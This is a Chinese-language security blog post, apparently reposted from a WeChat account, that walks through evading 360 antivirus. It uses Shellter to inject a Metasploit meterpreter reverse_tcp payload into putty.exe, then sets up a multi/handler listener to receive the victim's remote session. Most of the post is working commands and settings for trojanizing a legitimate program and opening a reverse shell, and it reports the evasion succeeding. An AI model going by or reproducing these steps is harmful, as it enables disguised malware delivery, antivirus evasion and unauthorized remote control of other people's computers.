MSF配合shellter实现360免杀

admin 2021年11月30日00:24:57评论147 views字数 1003阅读3分20秒阅读模式
利用shellter工具将MSF生成的木马文件与其他文件捆绑在一起,达到绕过杀毒软件建立会话控制服务器的目的。本次的绕过的杀毒软件为360。
攻击
kali
192.168.1.7
靶机
win7
/


一、运行shellter工具

①下载shellter:

apt-get install shellter


②安装Windows运行环境(等待时间稍长)

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

MSF配合shellter实现360免杀

③运行shellter

MSF配合shellter实现360免杀


choose operation mode - auto/manual: a  #自动模式pe target>/root/putty.exe              #选择要注入的文件程序enable stealth mode?>y                 #健康模式use a listed payload or custom>l       #选择列表set payload by index>1      #调用meterpreter_reverse_TCP模块set lhost:192.168.1.7set lport:1155

MSF配合shellter实现360免杀


④ 捆绑完成

此时已经完成捆绑,putty.exe已经被注入msf payload:

MSF配合shellter实现360免杀


二、攻击

①msf建立监听:

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost:192.168.1.7set lport:1155run

②建立会话

将putty.exe放进装有360杀毒的win7中,并运行。

MSF配合shellter实现360免杀

③ 会话建立成功,成功免杀360

MSF配合shellter实现360免杀

MSF配合shellter实现360免杀

但是会话大概在三分钟左右(甚至更短)会被360kill。同理,免费的没有收费的香,据说收费的强大的不行。

MSF配合shellter实现360免杀


历史文章推荐:

XSS 实战思路总结

内网信息收集总结

xss攻击、绕过最全总结

一些webshell免杀的技巧

命令执行写webshell总结

SQL手工注入总结 必须收藏

后台getshell常用技巧总结

web渗透之发现内网有大鱼

蚁剑特征性信息修改简单过WAF

内网渗透之域渗透命令执行总结

[WEB安全]Weblogic漏洞总结


查看更多精彩内容,还请关注橘猫学安全

每日坚持学习与分享,麻烦各位师傅文章底部给点个“再看”,感激不尽MSF配合shellter实现360免杀

原文始发于微信公众号(橘猫学安全):MSF配合shellter实现360免杀

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月30日00:24:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MSF配合shellter实现360免杀http://cn-sec.com/archives/653866.html

发表评论

匿名网友 填写信息